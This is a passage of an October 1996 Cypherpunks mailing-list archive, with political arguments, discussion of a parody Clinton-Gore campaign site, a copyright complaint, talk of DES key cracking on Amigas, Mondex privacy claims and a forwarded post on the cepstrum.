controlled) ISP's:  Compuserve, AOL, Prodigy, and hundreds if not thousands 
of "Mom+Pop" ISP's around the country.

I should also point out that given the fact that the Internet is at least 
doubling and probably tripling in size (packets and/or users) every year, if 
you go back to the last year that the backbone was government-financed) 
you'll probably discover that the Internet was far less than 1/10th of its 
current size.  

 
>Let me ask you this.  Do you enjoy the net of today (AOL, Spam, 
>XXX-rated transfers bogging down traffic)

Why should I mind the particular characteristics ("XXX-rated transfers") of 
the traffic jams?  What are you, some kind of Born-again christian or 
something?   And while I don't like the spam, either, I am under no illusion 
that this would be particularly avoidable, and certainly not EASILY or 
perfectly avoidable.  Spam is, at most, a minor inconvenience most of the time.


> to the net of yesterday 
>(100's of newsgroups not thousands, voluntary acceptance of 
>nettiquette, etc).  Dont get me wrong I was glad to see the AUP go.  
>But your absolute statements are maddening.
>
>> And "physical infrastructure"?  Sure they'll be physical infrastructure.  
>> It'll just be _privately_ owned.
>> 
>
>If it were feasible it would happen today.  Business groups (the ones 
>I have had VERY personal contact with, subsets of NAM) are frustrated 
>with Legislature's refusal to act in the best public interest.  If it 
>were feasible they would own their own transportation system.  It is 
>not!

It sounds like you're making a contradition.  Previously, you suggested that 
a privatized system wouldn't work, but at the end of the last paragraph you 
seem to be saying that the blame falls on "the legislature"'s doing 
something wrong.

See the problem with that position?  Please get your story straight.


>> The difference between private and public corruption is that in private 
>> corruption, individuals presumably have the right to fight that corruption 
>> where it impacts on their rights and assets.  In PUBLIC corruption, the 
>> taxpayer is rarely given the opportunity to fight the loss of his assets.
>
>Where did you get that law degree?  (BTW, mine comes from the 
>University of Wisconsin- Madison).  Ask the victims of the S&L 
>fiasco, the latest NASDAQ controversy, anyone making claims against a 
>company in some types of bankruptcy, etc., etc.  If you want I can 
>extend that list for you.

The main victims of the "S&L fiasco" were the taxpayers who had to pay 
hundreds of billions of dollars in claims due to the government 
simultaneously maintaining the S&L insurance but chancing the laws to allow 
the fraud that trashed that industry.  In other words, the problems were 
CAUSED BY GOVERNMENT.  And like I suggested, no the average taxpayer didn't 
have any ability to fight this rape of his wallet:  He didn't find out about 
it until it was mostly all over.

And if you object to being rooked in a company's bankruptcy, complain to the 
government who makes itself a preferred creditor  in almost all circumstances.


>Take for another example the recent corruption at Pabst.  Pabst 
>mismanaged the company and then took away RETIREEs benefits 
>(including death benefits.  No recourse.  Perfectly legal.  
>Inherently unfair.

If it's "perfectly legal" yet "inherently unfair," it sounds like much of 
the blame lies with the legislature, since it is the legislature that is 
responsible for the laws.  Huh?



>
>If it were done in a public context, heads would roll. " the 
>taxpayer is rarely given the opportunity to fight the loss of his
>assets."  What?  Are you suggesting there are no layers of 
>bureaucracy?  Not enough process?  Funny you sound like a democrat.

In the example _you_ mentioned, the S&L bailout, no "heads rolled."  Was any 
government employee punished at all?  I don't recall it!


>> It appears that you've convinced yourself that ESP exists and works.  Given 
>> that, it isn't surprising that you would believe that donations to 
>> candidates can't be "blinded" sufficiently to help dramatically reduce 
>> political quid pro quo.
>
>Jim, since you like the ad hominim, you are naive.  I understand 
>cryptographic blinding.  The world is not a computer.  And as I 
>stated above, even if you could, it wouldnt stop the flow of money.

The goal is not, specifically, to "stop the flow of money."  The goal is to 
ensure that candidates know as little as possible about where the money 
comes from.


>> >What you are not getting is that, in this case, the public employees 
>> >are the edge that causes the win.
>> 
>> How do you know this?  
>> 
>
>Try looking at election results. 

You still haven't proven your case.

> Jesus Jim, if you are going to take 
>controversial stands at least understand how the system works in 
>reality.  Get a copy of campaigns&elections.  Look in the back.  
>Remember we are in an information society.  People collect political 
>information.  It is for sale.  I am suprised that is new to you.

You are coming to conclusions without support.  As I said before, you've 
convinced yourself that you KNOW that a particular election went a 
particular way precisely because of "public employees."  Sigh!  


>
>
>> >  We have had some close races, the 
>> >winning margin is clearly less than the number of voting public 
>> >employees. 
>> 
>> The winning margin is ALSO clearly less than the number of many different 
>> identifiable groups.  You seem to be making assumptions in support of your 
>> theory.
>
>Actually, in my small city, with under 2000 active voters, it is 
>fairly easy to discern the number one identifiable group.  I DONT 
>deal in theory.  I deal in reality, you should try it.  While your 
>theories are enticing they are TOTALLY without the ability to be 
>realized.

You STILL aren't supporting your claims!

>> >This came from a discussion of vote delivery.  X has a block Y that 
>> >will vote for Z (the endorsed candidate) every time.  If victory 
>> >margin is less than Y, X's delivery controls the race.
>> 
>> Except that plenty of voting blocks exist.  And there's plenty of unknowns 
>> that you can't figure out with any certainty:  How certain are you that 
>> "Block Y" ALL voted for Z?  How do you know some other group didn't?  Etc.
>
>Politics deals with probability not certainty.  If you had ANY real 
>world experience you would know that.  Budgets are all dependant upon 
>reasonable probabilities.  Its really not that hard to grasp.

How much longer do you intend to waste my time?  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 25 Oct 1996 13:33:14 -0700 (PDT)
To: Jim Ray <jmr@shopmiami.com>
Subject: Re: http://www.clintongore96.com/ is hacked.
In-Reply-To: <199610251405.KAA35316@osceola.gate.net>
Message-ID: <9610251827.AA01236@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


...it's another spoof, not a hack.  The real web site is still at  
www.clintongore96.ORG ...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Fri, 25 Oct 1996 11:21:45 -0700 (PDT)
To: webmaster@americanbanker.com
Subject: Copyright violations
Message-ID: <199610251815.OAA13151@bksmp2.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain

I'm not sure if "webmaster@americanbanker.com" is the correct place to
report this, but I'm sure you can forward this to whomever is in charge
of enforcing your copyright.

One of your subscribers, dlv@bwalk.dm.com (Dr.Dimitri Vulis), has been
redistributing articles from American Banker to a cyptography mailing
list (cypherpunks@toad.com).  Attached is just one of the many articles
he has sent.

Many users on the cypherpunks list have asked him to stop or at least
tell us if he has permission to redistribute.  He has done neither.


To: cypherpunks@toad.com
Subject: [NEWS]
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 25 Oct 96 08:38:24 EDT
Comments: Dole/Kemp '96!
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks@toad.com

American Banker, 10/24/96

Gonzalez pushing consumer safeguards for electronic banking

Rep. Henry B. Gonzalez called Wednesday for aggressive congressional
action to protect consumers in the emerging world of electronic banking.
Releasing a blueprint for legislative action, the Texas Democrat urged
Congress to: *Adopt public policy standards relating to privacy,
disclosure, access, equity, and financial reliability for electronic
banking products and services.

*Hold oversight hearings to assess how well the industry is serving the
consumer in these five areas.

*Enact laws if the industry's performance falls below minimum
congressional standards.

*Define financial transactions to include the exchange of financial
information as well as cash.

*Consider revising current consumer protection laws. "Many of the
federal consumer protection laws are nearly 30 years old, and they were
not designed to deal with the effects of these new technologies," said
Rep. Gonzalez, the House Banking Committee's ranking minority member.
The report, "Connecting Consumers: Consumer Issues and Emerging
Financial Technology," recommends subjecting banks and nonbanks to the
same laws and regulations in this area. Republican committee members and
banking regulators have been reluctant to issue rules that might hinder
the development of new electronic banking products.

[I.e., more regulation of electronic commernce. -DV]

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps



rgds-- TA  (tallard@frb.gov)
I don't speak for the Federal Reserve Board, it doesn't speak for me.
pgp fingerprint: 10 49 F5 24 F1 D9 A7 D6  DE 14 25 C8 C0 E2 57 9D





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Fri, 25 Oct 1996 11:21:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: http://www.clintongore96.com/ is hacked.
In-Reply-To: <m2eninufyb.fsf@deanna.miranova.com>
Message-ID: <199610251820.OAA13285@bksmp2.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain


> >>>>> "Jim" == Jim Ray <jmr@shopmiami.com> writes:
> 
> Jim> I am not certain how long this will stay up, so those with
> Jim> mirrors who are inclined should visit soon.  JMR
> 
> It's still up as of 10AM Pacific Time. :-)
> 
> 	http://www.miranova.com/~steve/clintongore96-hack/
> 
> 	ftp://ftp.miranova.com/pub/people/Steve.Baur/clintongore96-hack.tar.gz

Is this a "hack" or just a parody?  I think Bubba's real site is at
http://www.clintongore96.org/ .
                         ^^^

rgds-- TA  (tallard@frb.gov)
I don't speak for the Federal Reserve Board, it doesn't speak for me.
pgp fingerprint: 10 49 F5 24 F1 D9 A7 D6  DE 14 25 C8 C0 E2 57 9D






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sat, 26 Oct 1996 03:17:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Recruiting machines for DES key recovery
Message-ID: <846324230.23608.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> There are thousands of Amigas out there, and they're powerful enough 
> to do video production on... a C port with assembler optimizations 
> shouldn't be more painful than one for a PC or Mac.  Why not put some
> of them to use (especially if they're unused) key cracking?
> 
> [Disclaimer: I have no first hand experience with programming Amigas 
> though... would they be too slow?]

I can`t do the port myself unless the PC code is going to be in C as 
I don`t write amiga assembler anymore (not for about 2 years).

As for the speed I have an A4000/030 here which is about equivalent 
to a 486 dx 33 or similar and the average amiga, an A1200 is about 
the same as a 486 sx 25

I really don`t think a port is worth doing though because there are 
few amiga owners who use the internet extensively because the TCP/IP 
stack (amitcp) for the amiga is a load of crap.


  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 25 Oct 1996 13:51:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <Pine.SUN.3.91.961025092106.15313D@crl.crl.com>
Message-ID: <7BBDwD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:
> 
> On Fri, 25 Oct 1996, Black Unicorn wrote to Dimitri:
> 
> > If you don't watch it I'll have a pair of my staff represent
> > [Ray] free of charge.
> 
> Now THAT would be a community service.

Why don't you use the funds pledges for my defunct trip to California
for Ray's lithium bill.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Fri, 25 Oct 1996 11:47:36 -0700 (PDT)
To: "David J. Phillips" <djphill@umich.edu>
Subject: Re: When did Mondex ever claim to be anonymous?
In-Reply-To: <199610251410.KAA17470@rodan.rs.itd.umich.edu>
Message-ID: <Pine.SUN.3.95.961025144740.28986L-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I believe you will find much of what you want at 

http://www.privacy.org/pi/activities/mondex/

which describes the trading standards complaint filed in the UK, and
largely upheld by the UK government; the complainant alleged Mondex was
saying it was anonymous when it was not.

See also, 

http://www.law.miami.edu/~froomkin/articles/oceanno.htm#xtocid583129

for a discussion of Mondex (surrounded by a discussion of its
competitors).  The article was written prior to the decision referenced
above.

On Fri, 25 Oct 1996, David J. Phillips wrote:

> Date: Fri, 25 Oct 1996 10:10:16 -0400
> From: "David J. Phillips" <djphill@umich.edu>
> To: cypherpunks@toad.com, e$@vmeng.thumper.com, dcsb@ai.mit.edu
> Subject: When did Mondex ever claim to be anonymous?
> 
> I've been researching the ways in which new payment systems incorporate
> anonymity,  traceability, or identification, and the ways in which those
> properties are presented by various people to various people.
> 
> Recently I've been looking particularly at Mondex. I remember receiving the
> impression several years ago, when I first heard of Mondex, that it was
> purporting to be anonymous, or at least private.  Now, however, I'm
> beginning a systematic analysis of their press releases and of press
> accounts, and I  find very few references to privacy.  One reference is in
> their web page FAQ, which says that Mondex transactions are "private, just
> like cash".  Simon Davies, in his complaint to the British Trading Standards
> authorities, also cites this FAQ, claiming that it used to read "anonymous,
> just like cash".  Davies also refers to an anonymity claim in the Mondex
> Media Pack.  But I've found very little else that suggests that Mondex ever
> hyped privacy. 
> 
> Can anyone give me an idea of how I got the idea that Mondex was making
> privacy one of its selling points?
> 
> David Phillips
> Visiting Instructor, Department of Communication Studies, University of Michigan
> Doctoral Candidate, Annenberg School for Communication, University of
> Pennsylvania
> 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hh Production-Mail system -- none <elibrary@infonautics.com>
Date: Fri, 25 Oct 1996 12:27:58 -0700 (PDT)
To: cypherpunks@toad.com (INFOUSER: cypherpunks)
Subject: The Electric Library
Message-ID: <199610251928.PAA06876@infobfs.infonautics.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Electric Library!  You are seconds away from using your 
free trial subscription to the Web's easiest, most comprehensive 
research service.  The User Name and Password you requested are listed
below.

Just follow these simple steps:

1.  Open your Web browser to the Electric Library site:
    http://www.elibrary.com

2.  Enter your question in the text box next to the "Go" button.

3.  Review your result list, and click on the title of the document
    you wish to view.

4.  Enter your User Name and Password in the appropriate boxes under
    "I'm already a member".

		Your User Name is:  cypherpunks
		Your Password is:   cypherpunks

5.  Click the "Continue" button.

You may want to print out this e-mail as a record of your User Name and
Password.

If you have any questions about using Electric Library, please select
"Help" from Electric Library menu bar, or e-mail elibrary@infonautics.com.
If this message was received in error, please inform us.

Thank you for trying Electric Library!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Murray Hayes" <mhayes@infomatch.com>
Date: Sat, 26 Oct 1996 03:21:51 -0700 (PDT)
To: "gary@systemics.com>
Subject: Re: I'm Confused about Algorithm Patents in Canada
Message-ID: <199610261021.DAA04914@infomatch.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Oct 1996 12:01:05 +0200, Gary Howland wrote:

>janke@unixg.ubc.ca wrote:
>> 
>> I have a library of crypto goodies that I would like to release,
>> but am kinda stuck on the copyright: I read in a very new book that
[snip]
>
>
>Yes, this certainly seems to be a grey area.  For instance, the MD of
>Digicash said recently that they have a worldwide patent on blinding,
[snip]
>	"European patents shall be granted for any inventions which are
>        susceptible of industrial applications, which are new and which
>        involve an inventive step."
>
>        The EPC does not define what is meant by inventions, but Article
>        52(2) lists subject-matter and activities "which shall not be
>        regarded as inventions" within the meaning of Article 52(1), in
>        particular:
>
>        - discoveries, scientific theories and mathematical methods
>                                               ^^^^^^^^^^^^^^^^^^^^
>        - aesthetic creations
>        - schemes, rules and methods for performing mental acts, playing
>games
>              or doing business, and programs for computers
>                                     ^^^^^^^^^^^^^^^^^^^^^^
>        - presentations of information
>
>I no nothing of patent law, but this certainly does seem to imply that
>algorithms themselves cannot be patented in Europe.  Any European patent
>experts out there?
>

Patents are different from copywrites.  In Canada there are specific
guidelines pertaining to what can and cannot be patented.  These guide
lines are avalible from the government (look in the blue pages).
Algorithims, circut designs, etc, etc (what about papers about them?)
are specifically excluded from copywrite laws in all countries that 
adhere to the international copywrite treaty (or what ever).

Algorithms come under intelectual property protection but I have no
idea what laws govern that.  I do recall that sevral years ago, a 
company sued an emplyee that was leaving.  The court ordered that he
could not obtain employment in his previous field for seven years
(practically a life time).

If in doubt you should probably seek professional legal advice because
you could get yourself into MAJOR legal trouble.



mhayes@infomatch.com
http://www.infomatch.com/~mhayes





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Fri, 25 Oct 1996 14:40:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: http://www.clintongore96.com/ is hacked.
Message-ID: <199610252139.QAA12708@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: jmr@shopmiami.com, cypherpunks@toad.com
Date: Fri Oct 25 16:35:55 1996
> I am not certain how long this will stay up, so those with mirrors who
>  are
> inclined should visit soon.

As of 1630 CST it was still there.

Should that cease to be, it's now mirrored at:

http://www.prairienet.org/bureau42/clinton.html

Share and enjoy.

dave



- ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702
dsmith@prairienet.org        http://www.prairienet.org/~dsmith
send mail with subject of "send pgp-key" for my PGP public key
"Better living through chemicals" - unattributed
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMnEyyzVTwUKWHSsJAQHhrAf9EassLGw5U+zR4Yj7z71adDNAcaZR/Z9w
Xe4EKIl4V4JtAjb/dmdtjDkzsyCNFhUc1n0r8MYGpumDxRRkYSBZObkQNc7vGOji
zmxYBrG6dOC0Dp8YxEqx9oXdGpOnDMDj2PD4Stq4BEDY8QHQlD4s/JbZVovU4KXF
E76NnO3yIOd7VXskzi2AL2oLmiNc04/hKqQAIWA8akHfVnbAJceMxg77271db1RE
6TIbJcVpKE6EqbM107TH5x0vUvvUU134dJzOwZUq5yeV7H//s2krm1FN/GrLPC8z
/9G3e/mlVT+ZitIf8UeEvsQP6XGkPC8zeQMs4aqaRXjkK7RCjOlefQ==
=rxac
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will rodger <rodger@interramp.com>
Date: Fri, 25 Oct 1996 13:44:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CyberPromo out of service, near bankruptcy
Message-ID: <199610252044.QAA12779@smtp2.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I rarely post re: anything but crypto policy, but what the heck - Cyber Promotions is down. It may never get up.

Details at out site.


http://www.zdnet.com/intweek/daily/961024x.html

Cheers

Will Rodger
Washington Bureau Chief
Inter@ctive Week

-----BEGIN PGP SIGNATURE-----
Version: 2.9

iQEVAgUBMnEl7kcByjT5n+LZAQFTyQgAzTJTT8SImOATbr59hq9qX+yPYePfLU5i
nLZtXXf9zjC2aK13s/JwJsoLVc8Y47acEjrFQsi/hF2b+c+ifP3e6wgHp3f5Ully
241uu6iu4Ywu2lEeIOU/azwDqQ3zXxzOJXfjyU/emqRtJpp2+R714y4mvQQF/5Bs
lGyzUp7dldEDltJgizBW6+l3MIoLU3+ELV0wv6GI+2JxMqpgniqZmBAsxPYFkC2Y
AHSyosexhRbCxIiO0QaJ52+Y+7HNxX5ktBC4P1i6Hj4K9BTfAUdy0OImAOE+gbZp
Wk2tonBX2XcpAoAbJG1RUc25UU0Miyt/uRk6P+dujxedNZfaQU4CIA==
=i8dT
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Fri, 25 Oct 1996 15:06:12 -0700 (PDT)
To: dsmith@prairienet.org
Subject: Re: http://www.clintongore96.com/ ...
Message-ID: <199610252205.SAA88064@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: dsmith@prairienet.org, cypherpunks@toad.com, jimg@mentat.com
Date: Fri Oct 25 18:02:44 1996
I was mistaken, and I now think it's a spoof, not a hack, but regardless 
it's a good anti-Clinton site, although still the best IMO is:

http://www.realchange.org/index.htm

Real People For Real Change, a non-affiliated, independent political
action committee with nothing nice to say about *anyone*.
                      ^^^^^^^
[I played a small part in convincing them to say bad things about Browne(!) 
on the theory that bad press is better than no press at all.]

Following notes on a Browne-campaign staff -- National Party staff 
conflict-of-interest, the Real Changers say:

"This being the Libertarians, other people argued that the other campaigns 
should have hired them, too!"

To know us is to love us, especially if you are the highest bidder.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMnE5DW1lp8bpvW01AQFo3AP+KwFdFegX73+2NIyy8l1CseTMb7bH03JN
L1r3/waMvrwI3NDUyVoOpHT4o5rQomnQwzbprb8L1yOaM2hv/y2MM6zs5HTtdwpG
z6y/Ku9JxWGE4xAw7g2MyYbtBhppNrJxBmwI48ruZk2OPy7tpGqCXWzmVv5QkZ+U
Rd9mXSIIeOk=
=llKb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: furballs <furballs@netcom.com>
Date: Fri, 25 Oct 1996 18:58:50 -0700 (PDT)
To: "Thomas C. Allard" <m1tca00@FRB.GOV>
Subject: Re: http://www.clintongore96.com/ is hacked.
In-Reply-To: <199610251820.OAA13285@bksmp2.FRB.GOV>
Message-ID: <Pine.3.89.9610251436.A26425-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain





On Fri, 25 Oct 1996, Thomas C. Allard wrote:

> > >>>>> "Jim" == Jim Ray <jmr@shopmiami.com> writes:
> > 
> > Jim> I am not certain how long this will stay up, so those with
> > Jim> mirrors who are inclined should visit soon.  JMR
> > 
> > It's still up as of 10AM Pacific Time. :-)
> > 
> > 	http://www.miranova.com/~steve/clintongore96-hack/
> > 
> > 	ftp://ftp.miranova.com/pub/people/Steve.Baur/clintongore96-hack.tar.gz
> 
> Is this a "hack" or just a parody?  I think Bubba's real site is at
> http://www.clintongore96.org/ .
>                          ^^^

I saw it this morning @ http://www.clintongore96.com. It was still up at 
10:30 PST

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 25 Oct 1996 16:09:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: USAF Speech Subterfuge (fwd)
Message-ID: <1.5.4.32.19961025230829.006d37c8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


----- Forwarded Message:

Date: 25 Oct 1996 10:48:12
To: Recipients of conference <fastnet@igc.apc.org>
From: james@bovik.org (James Salsman)
Subject: speech subterfuge


I have some indirect evidence that patent-related 
activities of the U.S. Air Force may have intentionally 
obscured the mathematical definition of "cepstrum" from 
the mid-1970s, with literally tremendous implecations 
for the computer speech processing industry (perhaps 
billions of dollars in real economic damage by now), and 
also harming current war reduction projects such as 
automatic language translation systems.  The correct 
definition was published in 1963 by Cooley and Tukey 
(who also coined the term "bit".)  For those who care, 
the Cooley-Tukey cepstrum is:

  FFT( ln( | FFT( sample .* window ) | ) )

And for speech processing, the definition is:

  FFT( ln( melScale( | FFT( sample .* window ) | ) ) )

(The "melody scale" atenuates frequencies atenuated by 
the human ear.  N.B.: Both the resulting cepstral 
magnitude and phase are significant, e.g., the result 
is a vector of complex numbers.  Furthermore, only 
the first few elements of the cepstral vector are 
necessary for the formant envelope, while the exitation 
(i.e., the harmonics) are encoded as a peak towards the 
end of the vector.)

The error has been to use the inverse Fourier transform 
instead of the second (outside) FFT, which seems to be
why researchers have been experimenting with the 
(slightly) better Discrete Cosine Transform, from video 
signal processing.

Sincerely,
:James Salsman

----- End Forward





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Fri, 25 Oct 1996 17:32:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: slander and call for lawyers. :)
Message-ID: <199610260032.UAA315084@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Fri Oct 25 20:29:30 1996

[I sent a version of this note privately to Ray, Sandy, and Unicorn, and now 
I've decided to send it publicly to the list. Hi Dmitri, you've finally done 
it.]

Uni wrote:

> If you don't watch it I'll have a pair of my staff represent him free of
> charge.

I hereby transfer my pledge of a shipment of guava pastries (that was me) 
from Sandy's meeting to Black Unicorn's lawyers if he chooses to go ahead 
with this, since the "let's Meet Dmitri" meeting seems to be off anyway. ;)
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMnFbcm1lp8bpvW01AQEaaAQAj8xsx5RZv56xKKEZhuthlvf9gNZANE+L
f82rFV7FRj3BBJyo2phbiYlU8+dXMKIEHv2w5lhqzS2PB9hgwVcap+iOVcd0EqB6
KDOx+ez86gjYqv+Q7bcxxI+cB7iXq/01R+1JUeSTSFnrw6+Vnts8e02DHaTnGxMz
qPKFUupyYd4=
=u3SP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 25 Oct 1996 20:42:13 -0700 (PDT)
To: Jim Ray <jmr@shopmiami.com>
Subject: Re: http://www.clintongore96.com/ is hacked.
In-Reply-To: <199610251405.KAA35316@osceola.gate.net>
Message-ID: <Pine.SUN.3.91.961025204142.4430B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


It's a parody site.

www.cg96.org is the real one.

-Declan


On Fri, 25 Oct 1996, Jim Ray wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Mime-Version: 1.0
> Content-Type: text/plain
> Content-Transfer-Encoding: 7bit
> 
> To: cypherpunks@toad.com
> Date: Fri Oct 25 10:02:50 1996
> A much better job than the Dole-Kemp redirect, IMO. 
> This guy really put some effort into the job, redoing all the sub-pages as 
> well, it seems. For example, from the "health care" page:
> [Picture of Hillary]
> "Who better to pick your doctor than America's smartest woman?"
> 
> I am not certain how long this will stay up, so those with mirrors who are 
> inclined should visit soon.
> JMR
> 
> 
> Regards, Jim Ray. -- DNRC Minister of Encryption Advocacy
> 
> Defeat the Duopoly! Vote Harry & Jo http://www.HarryBrowne96.org/
> ___________________________________________________________________
> PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
> I will generate a new (and bigger) PGP key-pair on election night.
> jmr@shopmiami.com (Preferred)
> 
> Despite almost every experience I've ever had with federal authority,
> I keep imagining its competence. -- John Perry Barlow
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMnDIkG1lp8bpvW01AQFsYAP/b+mSc+ROsYI/zfy241hhAiIasly1dCvw
> OhjLe02Wl+cTg9dte9GV56QTDjwYA+cAsUOicl69PH3EX4SRq7T4n2HuRiY+OE3S
> O+DUqtUNT9oCG7YQ8c0EiE6LGFK7AIvFZlnr6rcSkilRdZ87lAUSQTw4PhpUsCDL
> XgMAkdykUyo=
> =QUCw
> -----END PGP SIGNATURE-----
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 25 Oct 1996 19:57:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: NSA Report: Anyone seen this?
Message-ID: <1.5.4.32.19961026025700.006d8f14@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to RF for this pointer for getting the NSA report. We'll 
get a copy next week and put it on our Web page:


http://www.ffhsj.com/bancmail/21starch/961017.htm


21st Century Banking Alert No. 96-10-17 
October 17, 1996 

National Security Agency Report Raises Systemic Security 
Issues Related to Anonymous Electronic Money 

[Snip report summary]

If you would like a copy of the report, please contact us at: 
21stCen@ffhsj.com or (202) 639-7200. 

Thomas P. Vartanian 
Robert H. Ledig 
David L. Ansell 

Washington, D.C. 

Visit the 21st Century Banking Alert Page on the
World Wide Web at 
http://www.ffhsj.com/bancmail/bancpage.htm 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 25 Oct 1996 23:39:29 -0700 (PDT)
To: Jim Ray <jmr@shopmiami.com>
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <199610260032.UAA315084@osceola.gate.net>
Message-ID: <Pine.SUN.3.91.961025232357.13647A-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 25 Oct 1996, Jim Ray wrote:

> Uni wrote:
> 
> > If you don't watch it I'll have a pair of my staff represent him free of
> > charge.
> 
> I hereby transfer my pledge of a shipment of guava pastries (that was me) 
> from Sandy's meeting to Black Unicorn's lawyers if he chooses to go ahead 
> with this, since the "let's Meet Dmitri" meeting seems to be off anyway. ;)

And in the spirit of Cypherpunk fellowship, I will transfer my
pledge of US$100 to Ray's legal fund if Dimitri does not make a
good faith effort to accept the California travel offer before it 
expires at midnight Halloween night.  Pledge partners, how say
you?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 25 Oct 1996 23:37:12 -0700 (PDT)
To: hal@rain.org (Hal Finney)
Subject: Re: Anonymous Auth Certificates [was: Re: Blinded Identities]
